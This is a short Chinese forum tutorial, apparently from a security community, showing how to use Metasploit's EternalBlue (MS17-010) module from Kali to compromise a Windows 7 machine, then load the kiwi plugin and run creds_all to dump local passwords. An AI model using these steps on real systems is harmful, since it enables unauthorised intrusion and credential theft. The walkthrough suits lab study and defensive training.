Metasploit利用ms17-010永恒之蓝漏洞入侵windows7 - ☕ 经验茶谈极核论坛 - 知识星球 - 极核GetShell

Metasploit利用ms17-010永恒之蓝漏洞入侵windows7

攻击机:kali linux系统

目标机:windows7系统

端口扫描

nmap扫描目标机开放的端口

发现开放135、139和445端口,运行SMB服务。

屏幕截图(129)

 

漏洞扫描

kali终端输入msfconsole,启动metasploit工具。

屏幕截图(130)

 

搜索永恒之蓝漏洞扫描脚本(search ms17-010),设置好扫描信息配置,最后输入”run”运行脚本。

屏幕截图(131)

扫描发现目标机存在永恒之蓝漏洞。

 

漏洞利用

使用ms17-010漏洞利用脚本(use exploit/windows/smb/ms17_010_eternalblue),查看所需的参数信息(show options),并设置目标参数,最后输入”run”运行脚本。

屏幕截图(132)

 

漏洞利用成功。

 

后期漏洞利用

加载kiwi插件(load kiwi),获取目标机的本地用户名和密码(creds_all)。

屏幕截图(133)

注:在一小部分的系统上无法成功获取用户名密码。

请登录后发表评论